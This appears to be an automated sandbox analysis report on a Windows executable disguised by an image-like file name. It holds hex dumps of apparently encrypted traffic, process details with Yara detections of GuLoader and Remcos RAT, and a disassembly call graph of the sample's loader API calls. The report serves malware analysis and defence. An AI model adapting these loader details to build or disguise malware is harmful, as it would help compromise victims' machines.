                                      2024-11-13 07:18:55 UTC8000INData Raw: 86 9f a4 14 8e 6f c2 4c 76 03 40 aa 48 25 b6 45 ef 72 f7 7e ab 5f 9d 56 85 29 f8 f7 45 b5 51 3e 95 2d 7b b3 bb a6 82 52 79 39 24 45 a4 22 95 d1 4a 61 cd 01 ce 87 c2 ee 65 9d 68 f8 8d 1b fa 09 32 08 d4 54 90 5c 14 f2 b3 9b c2 0d 2e d5 6d 93 28 d7 46 ee f2 bc 99 8b bc 37 eb bb 04 9a d5 0f 53 ed 2a f3 15 c8 4a 5e ea b3 3b e9 87 32 43 84 a9 2b bf b9 e3 fa b9 19 88 77 40 49 f8 55 29 01 d4 d9 ca 83 17 37 9d f8 23 83 62 0b 39 8c 12 82 d6 77 76 78 b2 90 57 93 68 c8 56 8d d7 88 d6 3f 59 c6 a3 44 ec 3e 3a b1 de 64 d1 8f 7d 3f f8 c0 db 95 81 af 70 9d c5 b9 57 ac 31 a8 2a 12 e1 6b 7b 34 ae d2 5c f9 b3 85 43 32 95 5b 05 fe 0e 70 22 2c 23 59 3a e6 35 8f 13 57 95 ca bb 81 95 67 f7 61 0c 0c 4e a3 ab 75 41 6d cd 42 b2 81 89 27 94 fd 16 30 e0 4e 91 e2 59 b0 6f 57 74 b0 98
                                      Data Ascii: oLv@H%Er~_V)EQ>-{Ry9$E"Jaeh2T\.m(F7S*J^;2C+w@IU)7#b9wvxWhV?YD>:d}?pW1*k{4\C2[p",#Y:5WgaNuAmB'0NYoWt
                                      2024-11-13 07:18:55 UTC8000INData Raw: 24 3f 74 58 8d 9b 39 93 c2 59 8e 8a 46 a4 b3 f0 58 a0 6b 98 a0 1f d5 1a cd ee 86 8b 8f 7a e2 08 ec fb c3 09 95 b8 80 cf f6 31 d0 7b b0 37 5d 36 20 ab c0 ab 69 fe f6 93 f2 28 4b 7c 1f b9 3a ce 6d bf 26 ff 23 c3 b5 86 eb 0d c8 4c 92 14 40 2d 63 50 2a c5 24 44 c5 43 88 67 80 a2 94 67 88 2f c0 43 05 6f ac 20 14 f7 21 44 69 2d 63 db b7 3e 5c ed 36 57 3f e8 fe 0a a6 fe c8 c1 e3 11 6d 11 b7 2d ef 85 22 a2 20 44 a4 f3 2e 69 6c f7 fb 6e ac 96 22 57 2e b7 b3 91 13 5e 64 83 56 d4 d5 c3 87 5e ef db fe 78 15 d6 e1 96 8a 43 5b 93 f2 80 40 b1 59 08 7a 86 ed 5c 46 1e c4 53 a6 50 4c 36 ab aa 99 63 80 1d bf 44 99 ab 23 5f 49 2a e9 b8 9e 07 4d ed 59 4d 23 98 7f 4f c7 c8 16 52 a7 fb 44 1d ce 13 27 c6 b9 7f e8 79 8a 9a ef 7f 87 db 90 fc e1 61 d4 f1 6d 0c e2 95 7c ee b0 9b 72
                                      Data Ascii: $?tX9YFXkz1{7]6 i(K|:m&#L@-cP*$DCgg/Co !Di-c>\6W?m-" D.iln"W.^dV^xC[@Yz\FSPL6cD#_I*MYM#ORD'yam|r
                                      2024-11-13 07:18:55 UTC8000INData Raw: 7c 9d 8e 8c a2 fa 02 59 db 9b 7a 0a 60 9d a3 6d 87 9b fc 57 42 d2 a1 0c 89 6a c6 e4 9f e5 18 8b 55 c5 2d bc fd d1 04 09 49 8b 82 50 59 c2 f3 76 32 3a 2c 0c 5f f6 5d 0c eb 46 57 9a 71 e2 c6 8e f3 97 24 fb 20 84 b3 51 25 44 70 56 e3 d7 91 d3 5b de af 19 59 72 3e 82 bd 3b 67 b7 61 95 a4 5f 0c e9 cf d6 96 cd 54 4d 1d ad b2 83 17 9d e0 08 ec ee ee 06 e1 52 52 aa 2f 17 fa af f4 10 1f e8 0b 94 fa cd 51 8f 56 92 39 8c 56 33 b5 6b a0 a1 38 97 aa 96 f2 29 11 34 4f a4 1e 6a bd 9c f1 1d 02 3b 8d 78 04 f4 0f e2 9d 81 d1 13 33 4d 85 5c 4e 6c 11 44 08 67 cc 5f 88 12 d6 0b 74 c3 65 39 d1 8c e9 99 f7 33 70 c2 cf 34 25 2f 4d 5c 10 27 2b a1 7e 20 55 ae 20 cb 6e 5f 8d 98 6f 16 cb c6 02 ce b0 53 05 a0 f3 ed fc 9a 84 7e ed 37 52 11 f6 dd 4a 31 33 71 74 ad 81 76 ba e0 1d 80 ca
                                      Data Ascii: |Yz`mWBjU-IPYv2:,_]FWq$ Q%DpV[Yr>;ga_TMRR/QV9V3k8)4Oj;x3M\NlDg_te93p4%/M\'+~ U n_oS~7RJ13qtv
                                      2024-11-13 07:18:55 UTC8000INData Raw: ef ab 50 94 0e 5b 95 be 90 21 0d 2b fe 76 03 37 e9 92 ba c3 a1 ce e0 be de 5f b6 0c cd 54 2b a2 0b ca 4b b1 14 9d a8 55 49 2d 4b 42 a5 5a 4f 2b 16 00 50 8d a6 3b df 6a 7a 96 35 fb aa 22 ec f4 dc b0 f2 dc a5 18 8c 08 ea f5 b1 4b ab 0f 83 05 2b dc c4 99 08 e1 cf 82 e7 42 fb 44 15 16 8a 19 a1 04 d1 f6 09 e3 b1 9b 58 8f fa 03 04 3d 80 b0 80 3f e4 cf 8b 57 ee 64 b5 53 ef 0a d5 81 58 44 b9 05 aa 36 ee cd 18 ef 11 e6 07 ee 96 c3 30 01 5d f6 ec 2c 35 dc d7 0f cc b0 24 6e 83 08 47 2b 82 1b e0 63 c1 46 56 07 12 74 6c b8 cc 87 34 e6 cc 82 39 a5 39 95 5d a5 7f 4a fa 5e e6 2e c6 c2 cf 5b 31 b8 9a 19 df 4f af 95 78 c9 64 ea 54 1b 97 6c 40 06 a9 db 88 31 59 d3 ad d8 4b c7 75 0d 0e ad a5 03 26 18 8c 40 ac 53 ae ce c6 24 6d ca d2 2b 53 21 b9 cb 54 ef 32 7f b9 e6 6e d1 63
                                      Data Ascii: P[!+v7_T+KUI-KBZO+P;jz5"K+BDX=?WdSXD60],5$nG+cFVtl499]J^.[1OxdTl@1YKu&@S$m+S!T2nc
                                      2024-11-13 07:18:55 UTC8000INData Raw: 63 a6 fb 41 24 41 02 12 7c 11 9d d4 8f 78 55 2c bd 1c b1 1a c7 59 9e ae 3b 4f 8c 96 7f d3 ad f3 3b 44 e1 7f d6 7e 8d 71 44 92 a4 56 39 9c 81 86 a7 b9 82 cf c1 00 64 f6 ca 9a 8c ea 81 f4 af 42 63 7e a1 67 d4 73 93 27 6e d0 78 7d 3f ea 22 b6 52 fa 61 76 61 92 30 7e 96 4a 9a be c8 85 d0 84 99 01 d9 31 39 b0 3b 99 ed d3 63 ce c1 5d b5 1b d0 42 ed 85 69 37 b5 f5 fd de f2 c8 54 8a 88 c5 8f 9d 96 24 16 e9 f8 27 76 a1 9c 60 f0 15 f9 7e cb 03 a1 c6 47 ca 2c 5a 22 21 83 a5 de 3c d9 72 af b9 76 3e 6a 14 d3 20 b0 69 35 84 cf ea ea a8 bf 0f d2 11 1d ab 47 6e d6 d1 70 39 e7 ff 24 eb 49 67 e1 cc b2 ea d2 30 4e f1 cb 13 e7 da 22 f5 00 1f 0e 64 96 5a 61 8d d7 fb 81 95 41 34 b8 c9 98 2c bb 40 98 31 3c 07 72 00 60 cd f8 06 60 f3 59 08 d8 31 a6 75 53 b9 f0 21 7f 69 8c 37 ed
                                      Data Ascii: cA$A|xU,Y;O;D~qDV9dBc~gs'nx}?"Rava0~J19;c]Bi7T$'v`~G,Z"!<rv>j i5Gnp9$Ig0N"dZaA4,@1<r``Y1uS!i7
                                      2024-11-13 07:18:55 UTC8000INData Raw: 46 d5 33 4c 15 4b ef 3a 06 45 a9 4a 81 c4 9e 1a bf 06 d3 c3 a7 4e b4 c4 1f 21 32 7c 6d 29 02 55 47 b5 6f a0 39 f1 2f c3 6f 36 c2 34 f6 a6 b7 b0 bf 19 d7 46 be 02 92 3e 5d c6 b6 9c aa 58 18 62 3b 46 e9 af b8 d7 35 16 d3 d0 ef 4e 31 34 ca a6 be 57 05 4e f5 a2 77 e3 a2 0b 22 19 83 78 b8 fd 81 4a e4 60 47 b9 61 6f a4 2f 35 6b d4 b0 f9 fe 9d dd 61 54 1f 15 4e 79 2d 7d 11 14 2e 72 36 f0 57 2f b4 57 7d 1c 78 a0 b6 ff 4c 39 06 1d 3c ef 04 d8 ba 5b c3 8f d9 e8 f6 8a ad 81 0f 42 1f 9f 5b cb 04 b0 9e a7 2d 34 06 98 82 37 79 c8 97 1d 10 35 ae d8 31 0a 44 f2 2d dd 29 95 6f 73 f6 0a 99 06 30 c0 00 af 50 7e 57 a8 c6 0f be 40 15 92 8c bd 8f 83 99 b9 86 7f d4 b5 c4 01 fb 1b 2f a8 75 c9 96 9f 0b c7 9b 98 84 75 5e db e2 e3 09 2c 80 e6 af e1 52 bd c9 ef 25 e2 5c fe 9e 25 c2
                                      Data Ascii: F3LK:EJN!2|m)UGo9/o64F>]Xb;F5N14WNw"xJ`Gao/5kaTNy-}.r6W/W}xL9<[B[-47y51D-)os0P~W@/uu^,R%\%
                                      2024-11-13 07:18:55 UTC8000INData Raw: 2e 75 6a 15 81 ce cd 38 15 85 19 03 31 6c 91 af 61 b3 99 9c a2 6f 3e 91 d0 3c 6a df ef 9e 19 41 9c d3 b5 59 dd 27 9c 44 a5 46 a4 1e 0f 9b f9 8c ec f2 91 cb 89 94 41 e7 00 e1 fc 51 a0 0b a3 4a 7f 3a d9 28 f1 7b 91 c8 f8 f8 1c 6f 41 c7 cd c3 2e 98 a2 49 fe d7 0e 99 fa a4 13 37 16 47 d8 01 bf f2 f6 af 2f 32 1f e0 52 26 f3 ce 99 43 07 e3 25 53 b1 cc 42 8c 31 64 ff 8c 59 54 5b 7c 67 03 f9 7e f0 7b cb 3f b4 3c 29 b3 90 cb 08 d2 16 ca 71 b8 9b 24 fe 97 c3 d1 41 f9 2e 10 10 6d 12 f2 6a 92 ad 59 b2 4a 9b 1a cf 4c 93 dd 51 f9 1d fc 42 35 3c 8f 92 17 fb 93 96 b4 55 b2 52 04 e2 34 fc e6 69 91 6e 26 0f fb 79 ed 84 06 22 98 2e 2d 00 a7 cb f1 a4 bd e1 02 bf e1 df 65 e9 83 cc ee d1 37 24 5e 65 cf cd 29 dc 00 c3 81 69 7b 26 11 4d f5 fe 4a 59 68 c6 4b fd 31 fe c0 10 b5 10
                                      Data Ascii: .uj81lao><jAY'DFAQJ:({oA.I7G/2R&C%SB1dYT[|g~{?<)q$A.mjYJLQB5<UR4in&y".-e7$^e)i{&MJYhK1
                                      2024-11-13 07:18:55 UTC8000INData Raw: 8b 91 ab 75 ff c1 b4 d5 2d 2b e8 d2 ee 36 29 70 20 41 8d 0a e3 ad 81 7d e6 70 f2 4c 3e 45 c4 b1 a7 2c c0 de a1 bd d1 79 6e 91 81 b9 60 fe 66 1d 94 44 52 2a be 64 83 0c 7e 94 ae 62 f9 4a 57 9b 96 bc ea 6b be bf bd 91 57 c7 86 8c b5 d8 0d 28 65 bb 43 b1 e5 83 3d 3f 5c d1 fb e0 3b 96 62 96 e1 21 67 3a 38 dd 17 dd 5c 22 43 87 4a db d5 66 cd 0c 8b 8c bb b4 43 38 14 3e 06 b5 ef 66 8c d8 08 4f c0 11 fc 43 70 10 ca 51 29 19 7f 46 47 60 01 3a 95 23 bd 4e 31 b4 76 ae ee 27 f6 0c 1f db 4a 9f 69 1b 9b fa d7 5c c7 2a 70 3f 44 f4 3f af 12 fe 27 ec 80 92 db 12 56 9c 6a 5e 7e ab 5c 81 f8 9d d1 b9 15 c8 34 62 3f 7b 75 76 1b db b4 db 06 c5 d8 24 52 df 87 ec 2c d1 8b 80 1d e1 2f b9 29 5c 49 a6 87 bf 51 06 8b 30 76 95 b2 56 69 4a 7f e2 fc 12 61 22 d7 3a b1 78 07 0b 94 c0 35
                                      Data Ascii: u-+6)p A}pL>E,yn`fDR*d~bJWkW(eC=?\;b!g:8\"CJfC8>fOCpQ)FG`:#N1v'Ji\*p?D?'Vj^~\4b?{uv$R,/)\IQ0vViJa":x5
                                      2024-11-13 07:18:56 UTC8000INData Raw: b4 44 96 6a b4 6b 77 e0 a0 d8 40 8a e0 39 05 fc a5 69 8f e2 38 d9 6e c6 a9 fe 01 15 52 85 95 f7 39 e2 da cd ce 52 c1 00 91 04 71 c4 11 36 8e c0 7f 3d 17 b2 54 ab a7 3e 58 a5 34 79 76 4a 40 2d 67 3a 46 29 9f 75 2e cf dc da 7d 3a f1 cb 91 64 32 d1 fe c5 34 88 91 04 82 33 9b 90 ec b3 e7 70 12 39 48 58 84 35 df 4c f2 da 34 90 de e4 de 6f 54 18 4c 35 d8 13 c8 14 dd 5c e0 1f c3 91 a3 60 cd a9 03 b5 ad 58 2a 7b 44 70 f1 4d e1 83 db 99 ef d6 83 05 f4 4c f9 3a de cd 82 ee 87 03 8f 7c 09 45 fc 7c d8 1f 9d 8f 09 90 ea 4b 41 a7 17 44 6f 2a b7 3f 61 85 ab d1 e5 17 00 cf 6b aa 3b e5 d7 df 93 f5 2b e5 4c 32 aa 85 2f e2 a7 96 e3 e9 be 09 14 63 65 16 3f ee 40 28 cc 9c 95 9f 8f ec cc a2 53 fa 89 cc 45 83 b1 9b 75 09 c9 23 4d 7a 68 40 5a 80 4a 2b 45 54 45 24 25 e1 77 09 f3
                                      Data Ascii: Djkw@9i8nR9Rq6=T>X4yvJ@-g:F)u.}:d243p9HX5L4oTL5\`X*{DpML:|E|KADo*?ak;+L2/ce?@(SEu#Mzh@ZJ+ETE$%w


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:02:17:55
                                      Start date:13/11/2024
                                      Path:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
                                      Imagebase:0x400000
                                      File size:731'660 bytes
                                      MD5 hash:A03DCB82D6ECAAB34CC6AE971A806C06
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2056638671.000000000433E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:02:18:38
                                      Start date:13/11/2024
                                      Path:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
                                      Imagebase:0x400000
                                      File size:731'660 bytes
                                      MD5 hash:A03DCB82D6ECAAB34CC6AE971A806C06
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:21.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:16.2%
                                        Total number of Nodes:1541
                                        Total number of Limit Nodes:39
                                        execution_graph 4036 6e3329b1 4037 6e332a01 4036->4037 4038 6e3329c1 VirtualProtect 4036->4038 4038->4037 4973 4015c2 4974 402c5e 21 API calls 4973->4974 4975 4015c9 SetFileAttributesA 4974->4975 4976 4015db 4975->4976 4039 402543 4050 402c9e 4039->4050 4042 402c5e 21 API calls 4043 402556 4042->4043 4044 402560 RegQueryValueExA 4043->4044 4047 4027ed 4043->4047 4045 402580 4044->4045 4049 402586 RegCloseKey 4044->4049 4045->4049 4055 4061eb wsprintfA 4045->4055 4049->4047 4051 402c5e 21 API calls 4050->4051 4052 402cb5 4051->4052 4053 406113 RegOpenKeyExA 4052->4053 4054 40254d 4053->4054 4054->4042 4055->4049 4977 401a43 4978 402c5e 21 API calls 4977->4978 4979 401a4c ExpandEnvironmentStringsA 4978->4979 4980 401a60 4979->4980 4982 401a73 4979->4982 4981 401a65 lstrcmpA 4980->4981 4980->4982 4981->4982 4988 401744 4989 402c5e 21 API calls 4988->4989 4990 40174b SearchPathA 4989->4990 4991 401766 4990->4991 4992 401d44 4993 402c3c 21 API calls 4992->4993 4994 401d4b 4993->4994 4995 402c3c 21 API calls 4994->4995 4996 401d57 GetDlgItem 4995->4996 4997 40264d 4996->4997 4998 402ac5 SendMessageA 4999 402aea 4998->4999 5000 402adf InvalidateRect 4998->5000 5000->4999 5001 405345 5002 405355 5001->5002 5003 405369 5001->5003 5004 40535b 5002->5004 5013 4053b2 5002->5013 5005 405371 IsWindowVisible 5003->5005 5009 405388 5003->5009 5007 404379 SendMessageA 5004->5007 5008 40537e 5005->5008 5005->5013 5006 4053b7 CallWindowProcA 5010 405365 5006->5010 5007->5010 5014 404c80 SendMessageA 5008->5014 5009->5006 5019 404d00 5009->5019 5013->5006 5015 404ca3 GetMessagePos ScreenToClient SendMessageA 5014->5015 5016 404cdf SendMessageA 5014->5016 5017 404cd7 5015->5017 5018 404cdc 5015->5018 5016->5017 5017->5009 5018->5016 5028 40628d lstrcpynA 5019->5028 5021 404d13 5029 4061eb wsprintfA 5021->5029 5023 404d1d 5024 40140b 2 API calls 5023->5024 5025 404d26 5024->5025 5030 40628d lstrcpynA 5025->5030 5027 404d2d 5027->5013 5028->5021 5029->5023 5030->5027 4112 4023c9 4113 4023d1 4112->4113 4114 4023d7 4112->4114 4115 402c5e 21 API calls 4113->4115 4116 4023e7 4114->4116 4117 402c5e 21 API calls 4114->4117 4115->4114 4118 402c5e 21 API calls 4116->4118 4120 4023f5 4116->4120 4117->4116 4118->4120 4119 402c5e 21 API calls 4121 4023fe WritePrivateProfileStringA 4119->4121 4120->4119 4122 4020ca 4123 4020dc 4122->4123 4133 40218a 4122->4133 4124 402c5e 21 API calls 4123->4124 4126 4020e3 4124->4126 4125 401423 28 API calls 4128 40230f 4125->4128 4127 402c5e 21 API calls 4126->4127 4129 4020ec 4127->4129 4130 402101 LoadLibraryExA 4129->4130 4131 4020f4 GetModuleHandleA 4129->4131 4132 402111 GetProcAddress 4130->4132 4130->4133 4131->4130 4131->4132 4134 402120 4132->4134 4135 40215d 4132->4135 4133->4125 4136 402128 4134->4136 4137 40213f 4134->4137 4138 4053d1 28 API calls 4135->4138 4139 401423 28 API calls 4136->4139 4143 6e33176b 4137->4143 4140 402130 4138->4140 4139->4140 4140->4128 4141 40217e FreeLibrary 4140->4141 4141->4128 4144 6e33179b 4143->4144 4185 6e331b28 4144->4185 4146 6e3317a2 4147 6e3318c4 4146->4147 4148 6e3317b3 4146->4148 4149 6e3317ba 4146->4149 4147->4140 4233 6e33233f 4148->4233 4217 6e332381 4149->4217 4154 6e331800 4246 6e332568 4154->4246 4155 6e33181e 4160 6e331824 4155->4160 4161 6e33186c 4155->4161 4156 6e3317d0 4159 6e3317d6 4156->4159 4165 6e3317e1 4156->4165 4157 6e3317e9 4170 6e3317df 4157->4170 4243 6e332d53 4157->4243 4159->4170 4227 6e332ac8 4159->4227 4265 6e3315fb 4160->4265 4163 6e332568 11 API calls 4161->4163 4168 6e33185d 4163->4168 4164 6e331806 4257 6e3315e9 4164->4257 4237 6e332742 4165->4237 4176 6e3318b3 4168->4176 4271 6e33252e 4168->4271 4170->4154 4170->4155 4173 6e332568 11 API calls 4173->4168 4175 6e3317e7 4175->4170 4176->4147 4178 6e3318bd GlobalFree 4176->4178 4178->4147 4182 6e33189f 4182->4176 4275 6e331572 wsprintfA 4182->4275 4183 6e331898 FreeLibrary 4183->4182 4278 6e3312a5 GlobalAlloc 4185->4278 4187 6e331b4f 4279 6e3312a5 GlobalAlloc 4187->4279 4189 6e331d90 GlobalFree GlobalFree GlobalFree 4190 6e331dad 4189->4190 4202 6e331df7 4189->4202 4192 6e332181 4190->4192 4198 6e331dc2 4190->4198 4190->4202 4191 6e331c4d GlobalAlloc 4210 6e331b5a 4191->4210 4193 6e3321a3 GetModuleHandleA 4192->4193 4192->4202 4196 6e3321b4 LoadLibraryA 4193->4196 4197 6e3321c9 4193->4197 4194 6e331c98 lstrcpyA 4200 6e331ca2 lstrcpyA 4194->4200 4195 6e331cb6 GlobalFree 4195->4210 4196->4197 4196->4202 4286 6e331652 GetProcAddress 4197->4286 4198->4202 4282 6e3312b4 4198->4282 4200->4210 4201 6e3320c3 4201->4202 4214 6e33211c lstrcpyA 4201->4214 4202->4146 4203 6e33221a 4203->4202 4205 6e332227 lstrlenA 4203->4205 4204 6e332047 4285 6e3312a5 GlobalAlloc 4204->4285 4287 6e331652 GetProcAddress 4205->4287 4209 6e331f89 GlobalFree 4209->4210 4210->4189 4210->4191 4210->4194 4210->4195 4210->4200 4210->4201 4210->4202 4210->4204 4210->4209 4211 6e3312b4 2 API calls 4210->4211 4280 6e3315c4 GlobalSize GlobalAlloc 4210->4280 4211->4210 4212 6e3321db 4212->4203 4215 6e332204 GetProcAddress 4212->4215 4214->4202 4215->4203 4216 6e33204f 4216->4146 4222 6e33239a 4217->4222 4219 6e3324d6 GlobalFree 4220 6e3317c0 4219->4220 4219->4222 4220->4156 4220->4157 4220->4170 4221 6e332448 GlobalAlloc MultiByteToWideChar 4224 6e332495 4221->4224 4225 6e332474 GlobalAlloc CLSIDFromString GlobalFree 4221->4225 4222->4219 4222->4221 4223 6e3312b4 GlobalAlloc lstrcpynA 4222->4223 4222->4224 4289 6e33133d 4222->4289 4223->4222 4224->4219 4293 6e3326d6 4224->4293 4225->4219 4228 6e332ada 4227->4228 4229 6e332b7f EnumWindows 4228->4229 4232 6e332b9d 4229->4232 4231 6e332c69 4231->4170 4296 6e332a74 4232->4296 4234 6e332354 4233->4234 4235 6e3317b9 4234->4235 4236 6e33235f GlobalAlloc 4234->4236 4235->4149 4236->4234 4241 6e332772 4237->4241 4238 6e332820 4240 6e332826 GlobalSize 4238->4240 4242 6e332830 4238->4242 4239 6e33280d GlobalAlloc 4239->4242 4240->4242 4241->4238 4241->4239 4242->4175 4244 6e332d5e 4243->4244 4245 6e332d9e GlobalFree 4244->4245 4300 6e3312a5 GlobalAlloc 4246->4300 4248 6e3325f3 lstrcpynA 4254 6e332574 4248->4254 4249 6e332604 StringFromGUID2 WideCharToMultiByte 4249->4254 4250 6e332628 WideCharToMultiByte 4250->4254 4251 6e332649 wsprintfA 4251->4254 4252 6e33266d GlobalFree 4252->4254 4253 6e3326a7 GlobalFree 4253->4164 4254->4248 4254->4249 4254->4250 4254->4251 4254->4252 4254->4253 4255 6e3312f6 2 API calls 4254->4255 4301 6e331361 4254->4301 4255->4254 4305 6e3312a5 GlobalAlloc 4257->4305 4259 6e3315ee 4260 6e3315fb 2 API calls 4259->4260 4261 6e3315f8 4260->4261 4262 6e3312f6 4261->4262 4263 6e331338 GlobalFree 4262->4263 4264 6e3312ff GlobalAlloc lstrcpynA 4262->4264 4263->4168 4264->4263 4266 6e331634 lstrcpyA 4265->4266 4267 6e331607 wsprintfA 4265->4267 4270 6e33164d 4266->4270 4267->4270 4270->4173 4272 6e33187f 4271->4272 4273 6e33253c 4271->4273 4272->4182 4272->4183 4273->4272 4274 6e332555 GlobalFree 4273->4274 4274->4273 4276 6e3312f6 2 API calls 4275->4276 4277 6e331593 4276->4277 4277->4176 4278->4187 4279->4210 4281 6e3315e2 4280->4281 4281->4210 4288 6e3312a5 GlobalAlloc 4282->4288 4284 6e3312c3 lstrcpynA 4284->4202 4285->4216 4286->4212 4287->4202 4288->4284 4290 6e331344 4289->4290 4291 6e3312b4 2 API calls 4290->4291 4292 6e33135f 4291->4292 4292->4222 4294 6e3326e4 VirtualAlloc 4293->4294 4295 6e33273a 4293->4295 4294->4295 4295->4224 4297 6e332a7f 4296->4297 4298 6e332a84 GetLastError 4297->4298 4299 6e332a8f 4297->4299 4298->4299 4299->4231 4300->4254 4302 6e33136a 4301->4302 4303 6e331389 4301->4303 4302->4303 4304 6e331370 lstrcpyA 4302->4304 4303->4254 4304->4303 4305->4259 4306 4014ca 4307 4053d1 28 API calls 4306->4307 4308 4014d1 4307->4308 5031 402e4a 5032 402e72 5031->5032 5033 402e59 SetTimer 5031->5033 5034 402ec7 5032->5034 5035 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5032->5035 5033->5032 5035->5034 4327 40244e 4328 402480 4327->4328 4329 402455 4327->4329 4331 402c5e 21 API calls 4328->4331 4330 402c9e 21 API calls 4329->4330 4332 40245c 4330->4332 4333 402487 4331->4333 4334 402466 4332->4334 4338 402494 4332->4338 4339 402d1c 4333->4339 4336 402c5e 21 API calls 4334->4336 4337 40246d RegDeleteValueA RegCloseKey 4336->4337 4337->4338 4340 402d28 4339->4340 4341 402d2f 4339->4341 4340->4338 4341->4340 4343 402d60 4341->4343 4344 406113 RegOpenKeyExA 4343->4344 4345 402d8e 4344->4345 4346 402d9e RegEnumValueA 4345->4346 4353 402e38 4345->4353 4355 402dc1 4345->4355 4347 402e28 RegCloseKey 4346->4347 4346->4355 4347->4353 4348 402dfd RegEnumKeyA 4349 402e06 RegCloseKey 4348->4349 4348->4355 4350 4066b5 5 API calls 4349->4350 4352 402e16 4350->4352 4351 402d60 6 API calls 4351->4355 4352->4353 4354 402e1a RegDeleteKeyA 4352->4354 4353->4340 4354->4353 4355->4347 4355->4348 4355->4349 4355->4351 5036 6e33103d 5039 6e33101b 5036->5039 5046 6e33154b 5039->5046 5041 6e331020 5042 6e331027 GlobalAlloc 5041->5042 5043 6e331024 5041->5043 5042->5043 5044 6e331572 3 API calls 5043->5044 5045 6e33103b 5044->5045 5047 6e331551 5046->5047 5048 6e331557 5047->5048 5049 6e331563 GlobalFree 5047->5049 5048->5041 5049->5041 5050 4027cf 5051 402c5e 21 API calls 5050->5051 5052 4027d6 FindFirstFileA 5051->5052 5053 4027f9 5052->5053 5057 4027e9 5052->5057 5058 4061eb wsprintfA 5053->5058 5055 402800 5059 40628d lstrcpynA 5055->5059 5058->5055 5059->5057 4439 401c53 4440 402c3c 21 API calls 4439->4440 4441 401c5a 4440->4441 4442 402c3c 21 API calls 4441->4442 4443 401c67 4442->4443 4444 401c7c 4443->4444 4445 402c5e 21 API calls 4443->4445 4446 401c8c 4444->4446 4447 402c5e 21 API calls 4444->4447 4445->4444 4448 401ce3 4446->4448 4449 401c97 4446->4449 4447->4446 4450 402c5e 21 API calls 4448->4450 4451 402c3c 21 API calls 4449->4451 4452 401ce8 4450->4452 4453 401c9c 4451->4453 4454 402c5e 21 API calls 4452->4454 4455 402c3c 21 API calls 4453->4455 4456 401cf1 FindWindowExA 4454->4456 4457 401ca8 4455->4457 4460 401d0f 4456->4460 4458 401cd3 SendMessageA 4457->4458 4459 401cb5 SendMessageTimeoutA 4457->4459 4458->4460 4459->4460 4461 402653 4462 402658 4461->4462 4463 40266c 4461->4463 4465 402c3c 21 API calls 4462->4465 4464 402c5e 21 API calls 4463->4464 4466 402673 lstrlenA 4464->4466 4467 402661 4465->4467 4466->4467 4468 405ec7 WriteFile 4467->4468 4469 402695 4467->4469 4468->4469 5060 403a54 5061 403a5f 5060->5061 5062 403a63 5061->5062 5063 403a66 GlobalAlloc 5061->5063 5063->5062 4557 4014d6 4558 402c3c 21 API calls 4557->4558 4559 4014dc Sleep 4558->4559 4561 402aea 4559->4561 4562 401957 4563 401959 4562->4563 4564 402c5e 21 API calls 4563->4564 4565 40195e 4564->4565 4568 405a4f 4565->4568 4605 405d0d 4568->4605 4571 405a77 DeleteFileA 4575 401967 4571->4575 4572 405a8e 4584 405bbc 4572->4584 4619 40628d lstrcpynA 4572->4619 4574 405ab4 4576 405ac7 4574->4576 4577 405aba lstrcatA 4574->4577 4629 405c66 lstrlenA 4576->4629 4579 405acd 4577->4579 4581 405adb lstrcatA 4579->4581 4583 405ae6 lstrlenA FindFirstFileA 4579->4583 4581->4583 4583->4584 4603 405b0a 4583->4603 4584->4575 4637 406620 FindFirstFileA 4584->4637 4586 405c4a CharNextA 4586->4603 4588 405a07 5 API calls 4589 405bf6 4588->4589 4590 405c10 4589->4590 4591 405bfa 4589->4591 4592 4053d1 28 API calls 4590->4592 4591->4575 4596 4053d1 28 API calls 4591->4596 4592->4575 4593 405b9b FindNextFileA 4595 405bb3 FindClose 4593->4595 4593->4603 4595->4584 4597 405c07 4596->4597 4598 406066 40 API calls 4597->4598 4598->4575 4600 405a4f 64 API calls 4600->4603 4601 4053d1 28 API calls 4601->4593 4602 4053d1 28 API calls 4602->4603 4603->4586 4603->4593 4603->4600 4603->4601 4603->4602 4620 40628d lstrcpynA 4603->4620 4621 405a07 4603->4621 4633 406066 MoveFileExA 4603->4633 4643 40628d lstrcpynA 4605->4643 4607 405d1e 4608 405cb8 4 API calls 4607->4608 4609 405d24 4608->4609 4610 405a6f 4609->4610 4611 406587 5 API calls 4609->4611 4610->4571 4610->4572 4617 405d34 4611->4617 4612 405d5f lstrlenA 4613 405d6a 4612->4613 4612->4617 4614 405c1f 3 API calls 